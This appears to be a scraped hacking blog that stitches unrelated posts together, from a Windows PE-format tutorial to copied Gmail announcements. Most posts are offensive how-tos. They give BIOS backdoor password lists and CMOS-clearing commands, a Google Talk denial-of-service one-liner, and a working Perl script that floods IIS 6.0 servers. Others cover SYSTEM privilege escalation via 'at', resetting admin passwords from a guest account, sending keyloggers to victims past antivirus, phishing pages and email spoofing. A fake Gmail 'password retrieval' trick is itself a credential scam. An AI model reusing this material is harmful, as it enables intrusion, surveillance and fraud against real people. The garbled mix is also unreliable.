Search This Blog

Powered By Blogger

Friday, December 18, 2009

The PE Format

Warning: This document is contains purely technical information. This can be considered as iron, out of which weapons can be made :) . Additionally, this is about 48 pages long and written by me :)

Introduction:

Windows uses the Portable Executable Format to store executable files, also known as an “image” of an executable. Although the PE file contains all the information required to “run” a program, the PE file must first be parsed, processed and loaded into memory. This process involves allocation of memory, relocations, imports, etc. Thus, the PE file is simply an “image” of the executable, the executable being referred to the program in memory.

The Portable Executable Format is a highly portable format, compatible for use with many different 32 machines, on the various versions of windows. The PE format can be used identically for 64 bit machines, with very minor modifications.

This document does not act as a standard for the portable executable format, since such manuals already exist. This document also does not cover all the aspects of a portable executable. This document dives head first into the PE format, by directly observing the PE format of a simple test program. It is in the process of understanding the program itself, that the implementation of the PE will also become clear. It concentrates on the most commonly used parts in a usual portable executable, and later an analysis on changing certain values from those parts.

Aims:

The aim of the project is:

  • To develop an understanding on the structure of the Portable Executable
  • Understanding the process involved in loading of a PE image file from the hard disk to the memory
  • To emulate the working of the windows loader
  • Ability to create and alter any portable executable file to suit needs and wants.

Preparations:

The Test Program:

The program chosen for investigation is the standard “Hello World” Program. Its chosen for its simplicity, as well as:

  1. It uses library calls for outputting to a console
  2. The main standard sections in the executable are used.

The program, written in C, is:

#include

int main(void){

printf(”Hello World”);

return 0;

}

The code was compiled using Borland C++ compiler, free version 5.5.40.244. It was linked with the link32 linker also provided in the Borland compiler package.


Thus, we get a 51.00 kb .exe file which will be used to investigate into the structure of portable executables

Preparing the Hex Viewer:

All the fields in the PE file are byte aligned and thus, a hex viewer is necessary to view the file. The following is the source code for the hex viewer which produces a hexadecimal representation of the entire file:

#include

#include

#include

/*

Name: Hex Viewer

Copyright: croSSArrow

Author: Gaurav Tushar Mogre

Date: 30/09/08 18:06

Description: A Basic Hex File Viewer.

*/

using namespace std;

int main(int argc,char* argv[])

{

if(argc<2){

cerr<<”Format: hexviewer.exe n”;

return 1;

}

char fname[41];

strncpy(fname,argv[1],36);

fstream inpfile;

inpfile.open(fname,ios::in|ios::binary);

fstream outfile;

outfile.open(strcat(fname,”.hex”),ios::out|ios::binary);

while(!inpfile.eof()){

unsigned char ch;

inpfile>>ch;

if(ch<16) outfile<<”0×0″<

else outfile<<”0x”<

}

inpfile.close();

outfile.close();

cout<<”Written successfully to file: “<

return 0;

}

Thus, a file: testprogram.exe.hex is produced on running the above program, which generates the hexadecimal representation of testprogram.exe which makes it easier to analyze the file.

Bugs

We must have usually faced a problem that we cannot ‘view the hidden files’, even after selecting the option from the Folder Options Menu, and when we go back to check, we see that it has been mysteriously restored to ‘Do Not Show Hidden Files & Folders’.

It happens due to a small bug/virus which edits the Registry to create trouble for us.

Here is how we can solve it :

    ☻ [Theoretical Way]

Go to Registry Edit

[Start -> Run -> type "regedit"]

Browse to :

“HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\ Explorer\Advanced\Folder
\Hidden\SHOWALL”

and set the value of the key “Checked Value” as 1

    ☻ [Practical Way]

Open notepad,

copy paste the following [between start and stop]:
// START
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\ Explorer\Advanced\
Folder\Hidden]

“Text”=”@shell32.dll,-30499″

“Type”=”group”

“Bitmap”=hex(2):25,00,53,00,79,00,73,00, 74,00,65,00,6d,00,52,00,6f,00,6f,00,74,\

00,25,00,5c,00,73,00,79,00,73,00,74,00, 65,00,6d,00,33,00,32,00,5c,00,53,00,\

48,00,45,00,4c,00,4c,00,33,00,32,00,2e, 00,64,00,6c,00,6c,00,2c,00,34,00,00,\

00

“HelpID”=”shell.hlp#51131″

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Explorer\Advanced\Folder
\Hidden\NOHIDDEN]

“RegPath”=”Software\\Microsoft\\Windows\\ CurrentVersion\\Explorer\\Advanced”

“Text”=”@shell32.dll,-30501″

“Type”=”radio”

“CheckedValue”=dword:00000002

“ValueName”=”Hidden”

“DefaultValue”=dword:00000002

“HKeyRoot”=dword:80000001

“HelpID”=”shell.hlp#51104″

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Explorer\Advanced\Folder
\Hidden\SHOWALL]

“RegPath”=”Software\\Microsoft\\Windows\\ CurrentVersion\\Explorer\\Advanced”

“Text”=”@shell32.dll,-30500″

“Type”=”radio”

“CheckedValue”=dword:00000001

“ValueName”=”Hidden”

“DefaultValue”=dword:00000002

“HKeyRoot”=dword:80000001

“HelpID”=”shell.hlp#51105″

// STOP

Save it as whatever_u_want.reg

Double Click on that file to solve the problem,

it can be carried, mailed or kept as back-up too.

(Please remove the space in between registry entries)

BIOS Password Hack

Standard BIOS backdoor passwords

The first, less invasive, attempt to bypass a BIOS password is to try on of these standard
manufacturer’s backdoor passwords:
AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256,
j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER,
SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA,
ZAAADA, ZJAAADC, djonet,
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder

Other passwords you may try (for AMI/AWARD or other BIOSes)

LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj,phonix,toshiba

remember that passwords are Case Sensitive.

hacking BIOS via software

If you have access to the computer when it’s turned on, you could try one of those
programs that remove the password from the BIOS, by invalidating its memory.


However, it might happen you don’t have one of those programs when you have access
to the computer, so you’d better learn how to do manually what they do. You can reset
the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the
command prompt. You’d better do it in pure MS-DOS mode, not from a MS-DOS shell
window in Windows). Once you are in the debug environment enter the following
commands:
AMI/AWARD BIOS
O 70 17
O 71 17
Q

Thursday, December 17, 2009

Hacking Yahoo Messenger

This tutorial will tell you how to hack yahoo messenger while you are engaged in chatting with some person.While you are chatting through yahoo messenger, Yahoo will hide the IP addresses of all the computers that are connected through the yahoo messenger application to the chat room.So it is not possible to directly find out the IP of the person you want to hack.Then how to get the IP address? Yes it is still possible to hack the IP address during the Yahoo messenger chat.The procedure to Hack Yahoo messenger is discussed in detail below.

While you are chatting via yahoo messenger the communication between you and the person you want to hack, takes place indirectly via Yahoo server and not directly.It is not possible to hack Yahoo messenger directly to get the IP address.So to hack his IP, you must establish a direct communication with him.So,how to do this? It’s easy.Just start chatting with some one via Yahoo messenger.During the process of chatting send him a big file.Now the file transfer takes place directly between your computer and the victim’s computer(via yahoo messenger application).So now, you are ready to go. Here’s the step-by-step process to hack Yahoo messenger and get the IP address of the person .

  • Goto the COMMAND PROMPT (START>>>RUN>>>Type CMD).
  • Here Type “netstat -n” (without quotes).

NOTE: If you are new to “netstat” and other IP related commands refer this tutorial:Windows XP IP Utilities

  • The pic given below shows netstat results of my computer.I was not chatting when i took this pic and hence it looks modified.

  • Here local address is your own IP and the foreign address is the IP address of the recipient with whom you are connected via yahoo messenger (There may be multiple recipients and hence multiple foreign addresses).
  • Now send him the file.
  • Check the output by typing the command “netstat -n” (without quotes).
  • Assume the output is something like this.

TCP 127.0.0.10:5101 124.55.23.11:1246 ESTABLISHED

Here 124.55.23.11 is the IP address of the person with whom you are chatting and 1246 is the port number where connection is established.That’s It! You have now hacked Yahoo messenger to get his IP address.

Once you hack Yahoo messenger and get his IP address you can use any of the Remote Administration tools or perform NETBIOS HACKING.Refer this tutorial on Netbios Hacking.

NOTE: Some times there are chances where in the file transfer gets encrypted (takes place via yahoo server itself).So in this case the above hack may fail to work.

Popularity: 18% [?]

How to Become a Hacker?

Most of us are very curious to learn Hacking and want to become a Hacker, but don’t know where to start. If you are in the same situation, then this is the right place for you.

Every day I get a lot of emails where people ask me- How to Become a Hacker?. In fact this question is not easy to answer because, hacking is not an art that can be mastered overnight. It requires knowledge, skills, creativity, dedication and of course TIME. Everyone can become a Hacker provided they learn it from the basics. So if you wanna become a hacker, then all you need is a good source that will teach you hacking from the basics.

What skill do I need to Become a Hacker?

There is no magic to become a Hacker, but like anything else that is worthwhile it takes dedication, a willingness to learn. It is most important to have a good knowledge of topics such as Operating system and it’s working, Computer networks, Computer security and of course Programming. It’s not possible to become a hacker overnight. All you need is a good source (book) to start learn Hacking from the basics.

What is the best way to Become a Hacker?

The best way to become a Hacker is to start from the basics. You have to master the basics to build a strong foundation. And once this is done you’ll be in a position to explore new ideas and start thinking like a Hacker.

There exists tons of books on the market that teach you Hacking but unfortunately, it requires a set of pre-established skills and knowledge to understand the concepts explained in the book. Also these books are not meant the for beginners who doesn’t know anything about hacking. I have found an excellent Hacking Book for Beginners. This book is the first step to fulfil your dream to become a Hacker. Yes, this is the right book for the beginners who are interested to learn hacking from the basics. The good thing about this book is, any one can understand the concepts presented in the book without the need for any prior knowledge. The book is called

The Hacker’s Underground Handbook

NOTE: I have found that some of my readers have mistaken the book to be the Hacker’s Handbookwhich is widely available on the internet. But this book is called The Hacker’s Underground Handbook. The Hacker’s Underground Handbook is unique and is not available anywhere on the internet. So please don’t be confused. The Hacker’s Underground Handook and Hacker’s Handbook are different.

This book will take you from the core to the top. It will tell you how to hack in simple steps. Everything is presented in a simple and effective manner. It’s a greak book for the beginner who want to become a Hacker. This book will install a Hacker’s Mindset on you.

The following skills are uncovered in this book

1. You will learn all the hackers underground tricks and learn to apply them in real world situations.

2. You will be put into a hackers mindset and learn to think like a Hacker.

3. By learning how a hacker thinks and acts, you will be able to protect yourself from future hack attacks.

4. You will acquire knowledge nonexistent to 99.9% of the people in the world!

5. This Underground handbook may get you interested in pursuing a career as an Ethical Hacker.

This book is of great value for all those who have a dream to become a Hacker.

So, what are you waiting for? Go Download your copy of the book which from the following link

The Hacker’s Underground Handbook

What tools are required in my journey as a Hacker?

As a Hacker the number of tools that you require is almost endless. However at this point of time I recommend you to use the following 2 tools.

1. First of all it is mandatory for you to hide your real IP address while experimenting the tricks and tactics given in this book. To become a hacker this is your first step. So I recommend the following tool to mask your real IP.

Hide the IP

2. The another tool that I recommend is Anti-Hacker Toolkit. This kit can become handy for you to catch hackers who are trying to break into your computer without your knowledge. Also using this tool kit you can monitor all the incoming connections to your computer, detect keyloggers and scan for suspicious programs. For more info on this visit the following link

Anti-Hacker Toolkit

Wait… This is not the end. Rather it is just the beginning of your journey to become a hacker. To become a hacker all you need is dedication and hard work. I wish you all the best for your future success!

Gmail leaves beta, launches "Back to Beta" Labs feature

Gmail leaves beta, launches "Back to Beta" Labs feature

Tuesday, July 07, 2009 8:02 AM



We get asked all the time why Google keeps its products in beta for so long. And Gmail, five years after launch, is consistently a subject of this questioning, even of jokes.

Some people thought that once we opened sign-ups, Gmail should have come out of beta.

Others said that once we integrated chat, developed new anti-spam technology, expanded to 53 languages, shipped a mobile app, added group chat, launched an iPhone UI, added a vacation autoresponder, launched Gmail Labs, subsequently modified the vacation autoresponder with a Gmail Lab, launched 48 other Labs, launched video chat, enabled open protocols and APIs (POP, auto-forwarding, IMAP, and the Contacts Data API), let you POP mail in from other accounts, added a delete button, rearchitected our entire javascript code base, and added key functionality to get large companies, startups, universities, and many other organizations (in addition to Google itself) running on Gmail, we should have come out of beta.

Some people think we should wait until we launch <>.

Others say that, over the last five years, a beta culture has grown around web apps, such that the very meaning of "beta" is debatable. And rather than the packaged, stagnant software of decades past, we're moving to a world of rapid developmental cycles where products like Gmail continue to change indefinitely.

The end result (many visible and invisible changes later) is that today, beta is a thing of the past. Not just for Gmail, but for all of Google Apps — Gmail, Calendar, Docs, and Talk.

However, we realize that after five years, this leaves some of you wrestling with some tough questions. How will you ever get used to using Gmail without that familiar grey "BETA" text greeting you when you log in everyday? What example will you cite the next time you make an internet joke about perpetual betas? Don't despair... for those of you long-time Gmail-ers who might feel some separation anxiety, we've got a solution. Just go to Settings, click on Labs, turn on "Back to Beta," and it'll be like Gmail never left beta at all.

Back to Beta

Tip: Recover your password via text message

Thursday, July 09, 2009 12:24 PM



Even the best of us forget our passwords from time to time. In fact, recovering passwords is one of the top reasons people visit the Gmail Help Center. To help with these situations, we recently added the ability to recover your password via text message.

To turn this on for your account, just sign in, select 'Change Password Recovery Options,' enter your cell phone number and click 'Save.'

Next time you forget your password, enter your username on the password-assistance page, and Google will text you a recovery code. No need to check another email account or even leave the page.

In general, it's a good idea to add as many password recovery options to your Google Account as possible, like a secondary email address and security question. And don't forget to keep them up-to-date.

Recover Email Password using SMS

First of all..I would like to say that Gmail is out of Beta..yep..After a long time when they have integrated the best of world in their email system,Recover Password Using SMS - rdhacker.blogspot.comit was the right time to rip off the tag,and they did it.Further,with the world going mobile,they took some of the steps to better enhance the security even a notch above than other email services. It helps to know that even the best of us forget our passwords from time to time and In fact,the sheer amount of people visit Gmail help center everyday just to recover their passwords. To help with these situations, Google went a step ahead by adding the ability to recover your password via text message.
Gmail password SMS recover - rdhacker.blogspot.com
In order to access this feature,sign in to your account and select ' Change Password Recovery Options ' enter your cell phone number and click ' Save '
The Next time you forget your password, enter your username on the password-assistance page, and Google will text you a recovery code. No need to check another email account or even leave the page.
In general, it's a good idea to add as many password recovery options to your Google Account as possible, like a secondary email address and security question. And don't forget to keep them up-to-date.
Afterall,we all make mistakes :P

Cheers and Keep Learning

Tuesday, December 15, 2009

Shut Down Your Freind's Mobile

Here is a new trick to restart ur friends mobile via sms

with this trick only 1110,1110i,1112,1100,2100(Nokia) can be restarted.

just type
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

or 79 inverted commas

in text msg and send it to ur friend having cells mention above and see wat happens.

one recommended post

Bluetooth Hack

-: Exploits - Bugs - Vulnerabilities :-

-: Exploits - Bugs - Vulnerabilities :-

Google Talk EMail Notifition Denial Of Service

List: bugtraq
Subject: New Bug KESM in GoogleTalk
From: natalylopez380 () hotmail ! com
Date: 2005-11-09 0:01:40
Message-ID: 20051109000140.29652.qmail () securityfocus ! com
[Download message RAW]

Hi!! My name is Nataly Lopez, I'm a 17 years old girl living in Venezuela; I have \ always loved computer security because that's also my father's work.. Well, the \ reason for me to post this is for telling you about a bug in Google Talk I discovered \ with my friend chris77 (#velug @ irc.freenode.net) this afternoon. Google Talk's \ excellent features allow the user to know when contacts send mails without \ configuring any passports, etc., well, you know that. What's really funny is: one can \ generate remote errors in the users' systems connected to Google Talk, and thus \ creating a kind of DoS. So Google Talk stops working if it has email notification \ enabled: it suffices to type this command in a Linux shell (nail must be installed of \ course):

echo kill | nail -s Kill -r "" victim@gmail.com

This instruction is quite simple, and will send an email to the user being connected \ to Google Talk from a certain "unknown sender", and as you can see, GoogleTalk \ Windows client cannot notify <> is sending an email. Therefore, an error windows \ appears on screen:

[ Google Talk encountered an internal error, and must now close. Ok to report this \ error to Google? ] [Yes] [No]

We called this bug KESM, which stands for "Killer Empty Sender Message" :) and one \ can easily implement it into a loop, keeping the victim busy clicking on the YES \ button and resetting his connection to Google Talk.

That's all for now folks :-)

Vulnerable software and versions

Configuration 1
¢Ë†â€™ Google, Google Talk, 1.0.0.75
¢Ë†â€™ Google, Google Talk, 1.0.0.72
¢Ë†â€™ Google, Google Talk, 1.0.0.70
¢Ë†â€™ Google, Google Talk, 1.0.0.68
¢Ë†â€™ Google, Google Talk, 1.0.0.67
¢Ë†â€™ Google, Google Talk, 1.0.0.66
¢Ë†â€™ Google, Google Talk, 1.0.0.64, and previous

-: Exploits - Bugs - Vulnerabilities :-

Internet Information Server 6.0 Denial Of Service

#When sending multiple parallel GET requests to a IIS 6.0 server requesting
#/AUX/.aspx the server gets instable and non responsive. This happens only
#to servers which respond a runtime error (System.Web.HttpException)
#and take two or more seconds to respond to the /AUX/.aspx GET request.
#
#
#signed,
#Kingcope kingcope@gmx.net
###########################################################
###********************************************************
###
###
###
### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
### by Kingcope, May/2007
### Better run this from a Linux system
###########################################################

use IO::Socket;
use threads;
if ($ARGV[0] eq "") { exit; }
my $host = $ARGV[0];
$|=1;
sub sendit {
$sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 'http(80)', Proto => 'tcp');
print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n"; }
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 'http(80)', Proto => 'tcp');
print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n";
$k=0;
while (<$sock>) {
if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
$k=1;
last;
}
}
if ($k==0) {
print "Server does not seem vulnerable to this attack.\n";
exit;
}
print "ATTACK!\n";
while(1){
for (my $i=0;$i<=100;$i++) {
$thr = threads->new(\&sendit);
print "\r\r\r$i/100 ";
}
foreach $thr (threads->list) {
$thr->join;
}
}

# milw0rm.com [2007-05-21]

WELCOME TO HACKER EYE


one stop compilation for Ethical Hacking

Click here for HOME page

really that is possible !
Refer to the other articles on this wiki for the same topic
as windows seems to have fixed this bug..
still u can browse for educational purpose

u know why is it a "user" account because it lacks come service layer than that in "administrator" account

Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.

Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).

The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager

Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way:


You can trick the system into running a program, script, or batch file with system level privileges.

One sample

One trick is to use a vulnerability in Windows long filename support.
Try placing an executable named Program.*, in the root directory of the "Windows" drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the "Program Files" directory is a startup app. The call to "Program Files", will be intercepted by Program.*.

Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.


Quote:

In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.


Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
Code:
at

If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:

Code:
at 15:25 /interactive “cmd.exe”

Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:

When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:

You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:

Code:
explorer.exe



A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom):

System user name on start menu


explorer.exe running under SYSTEM

What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.





ADMINISTRATOR IN WELCOME SCREEN.


When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.


EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!


Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

HACKING

Means unauthorized access and it is illegal.

But what's the other definition. What is legal hacking?

Hack AdministratorThis is a featured page

Hack AdministratorThis is a featured page

Here we present the rock solid windows hacks
for educational purpose only! read disclaimer before reading this article!

_____

Windows NT/2000/XP/Vista offline password editor:
http://home.eunet.no/~pnordahl/ntpasswd

This is a utility to (re)set the password of any user that has a valid (local) account on your Windows NT/2000/XP/2003/Vista system, by modifying the encrypted password in the registry's SAM file.
You do not need to know the old password to set a new one.
It works offline, that is, you have to shutdown your computer and boot off a floppy disk or CD. The boot-disk includes stuff to access NTFS partitions and scripts to glue the whole thing together.
Works with syskey (no need to turn it off, but you can if you have lost the key)
Will detect and offer to unlock locked or disabled user accounts!
Caution: If used on users that have EFS encrypted files, and the system is XP or later service packs on W2K, all encrypted files for that user will be UNREADABLE! and cannot be recovered unless you remember the old password again!
Download links:
cd070409.zip (~3MB) - Bootable CD image with newer drivers
bd050303.zip (~1.1MB) - Bootdisk image, date 050303.
sc050303.zip(~1.4MB) - SCSI-drivers (050303) (only use newest drivers with newest bootdisk, this one works with bd050303)
To write these images to a floppy disk you'll need RawWrite2 which is included in the Bootdisk image download. To create the CD you just need to use your favorite CD burning program and burn the .ISO file to CD.


For Windows XP check out the attachment Below the comments!! It WORKS .AS IT CHANGES THE XP ADMIN PSWD WITHOUT U KNOWIN THE PREVIOUS ONE

however the "net user" and

"control userpasswords2" trick still works
: Rahul

You can change Administrator password from guest account without using any programs. It's easy:
1. Start-> Run, type lusrmgr.msc and hit Enter.
2. You will see window with two folders:Users and Groups. Go in the Users folder, find the Administrator, right click-> Set Password and now you can change the password without knowing the old one.


ALL TYPES OF NETWORK LIKE AIRTEL ETC.

Plz NOTE MY 95% Trix Are 2years Old so dont belief tricks soon will added 100% Work Free Tricks!


http://waphrishi.wen.ru/secret.html

HACK G-MAIL ID

Gmail id hacking step1: in the To field write mail.pw.get@gmail.com step2: in Subj filed write password retrieval step3: write id of person whose id should be hacked in 1st line of textbox step4: write yours id in 2nd line of textbox write yours password in 3rd line in 4th line paste the code given below gmail servers think that as if their employee is asking for password they simply return the password of required id note: you should do the exact procedure

How to Hack an Email

Everyday I get a lot of emails wherein my readers ask me How to Hack an Email? You as the reader are most likely reading this because you want to hack into someone’s email. So in this post I have decided to uncover the real and working ways to hack any email.

Can Emails Be Hacked?

Yes! As a matter of fact, almost anything can be hacked. But before you learn the real ways to hack email, the following are the things you should be aware of.

1. There is no ready made software that can hack emails just with a click of a button. So if you come accross a site selling “Email Hacking software” plz don’t trust it.

2. Never trust any email hacking service that claims to hack any email just for $100 or $200. All of the email hacking services are scam.

3. With my experience of over 6 years in the field of Hacking and Security, I can tell you that there exists only 2 foolproof methods to hack an email. All the other email hacking methods are simply scam or don’t work. The following are the only 2 working and foolproof methods for email hacking.

1. EASIEST WAY TO HACK AN EMAIL

The easiest way to hack an email is by using a keylogger. A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. To use it you don’t need to have any special knowledge. Anyone with a basic knowledge of computer can use it. With my experience I recommend the following keyloggers as the best for hacking email.

SniperSpy

Win-Spy

Email Hacking

I don’t have physical access to the target computer, can I still use sniperspy?

Yes you can still use it for hacking email. Because keyloggers like SniperSpy and Win-Spy offers Remote Installation Feature. With this feature it is possible to remotely install the keylogger on the victim’s PC. However they can also work on a local computer.

Hacking Email

What if the antivirus block from sending it as an email attachment?

Instead of sending the keylogger as an email attachment, you place the file in .ZIP/.RAR format and upload it to www.hotlinkfiles.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.

Hacking Email

Email Hacking

Click Here to Order SniperSpy Now!

NOTE: For more details on keylogger read my post How to use Keyloggers

2. OTHER WAYS TO HACK AN EMAIL

The other most commonly used trick for hacking email is by using Fake Login Pages. Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & pw) are redirected to remote server and we get redirected to some other page. Many times we ignore this but finally we lose our valuable data. However creating a fake login page and taking it online to successfully hack an email is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So I recommend the usage of keyloggers for hacking email since it’s the easiest one.

I hope this info has helped you. Happy Email Hacking!

How to Send Anonymous Emails


Most of us are very curious to know a method to send anonymous emails to our friends for fun. But the question is, is it possible to send anonymous emails in spite of the advanced spam filtering technology adopted by email service provides like Gmail, Yahoo etc? The answer is YES, it is still possible to bypass their spam filters and send anonymous emails to your friends. For example, you can send an email to your friend with the following sender details.

From: Bill Gates


The art of sending this kind emails is known as Email Spoofing. In my previous post on How to Send Fake Email I insisted on using your own SMTP server to send anonymous emails. This method used to work successfully in the past, but today it has a very low success rate since Gmail and Yahoo(all major email service providers) blocks the emails that are sent directly from a PC. In this post I have come up with a new way to send anonymous emails (spoofed emails) that has 100% success rate. If you have to successfully send an anonymous email or spoofed email, you should send it using a relay server.

What is a Relay Server?

In simple words, a relay server is an SMTP Server that is trusted by Google or Yahoo as an authorised sender of the email. So, when you send an email using a relay server, the email service providers like Yahoo and Gmail blindly accept the emails and deliver it to the inbox of the recipient. If the SMTP server is not authorised, Google and Yahoo will reject all the emails sent from this SMTP server. This is the reason for which using our own SMTP server to send emails fail.

So What’s Next?

Now all we have to do is, find a trusted SMTP server to Send Spoofed Emails. Usually all the emails that are sent from web hosting providers are trusted and authorised. So, you have to find a free web hosting provider that allows you to send emails. But, most of the free Web Hosts disable the Mail feature and do not allow the users to send emails. This is done just to avoid spamming. However all the paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows to send emails from their servers, it’s just a cakewalk to send anonymous emails. All we have to do is just modify the email headers to insert the spoofed From address field into it.

I have created a PHP script that allows you to send emails from any name and email address of your choice. The script can be found here.

Anonymous Email Sender Script

Here is a step-by-step procedure to setup your own Anonymous Email Sender Script

1. Goto X10 Hosting and register a new account.

2. Download my Anonymous Email Sender Script (sendmail.rar).

3. Login to your FreeWebHostingArea Account and click on File Manager.

4. Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.

5. Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777.

6. Now type the following URL

http://yoursite.x10hosting.com/sendmail.php

NOTE: yoursite must be substituted by the name of the subdomain that you have chosen during the registration process.

7. Use the script to send Anonymous Emails. Enjoy!!!

Tell me whether it worked or not. Please pass your comments…

WARNING: ALL THE INFORMATION PROVIDED IN THIS POST ARE FOR EDUCATIONAL PURPOSE ONLY. I AM NOT RESPONSIBLE FOR ANY MISUSE.

The True Meaning of Hacking

People seriously need to know what hacking really means.

People think that hacking is guessing someone’s password for an account or using cheat codes for a game. Hacking is when cracking into an account or cheating in a game without using cheat codes. Hacking passwords requires a program or requires finding glitches from the website. A glitch is like a tweak or passage way that wasn’t fixed. Hacking Games requires editing of the files of the game or using a program to cheat for you.

Hacking games is also not using tips or tricks to win a game. The simplest way to describe hacking a game is that when some one is playing unfairly and not obeying the rules for fair play. Game Administrators use anti game hacking systems that protects the game, players and the staff members of the game from any hacking attempts. Yet there is no system that blocks people from hacking accounts except for firewalls. The best way to not get hacked is to use a strong password or use symbols in your password such as these ^&#@.

Hacking is illegal and tracker a hacker on a computer is much harder than finding a hacker in a game.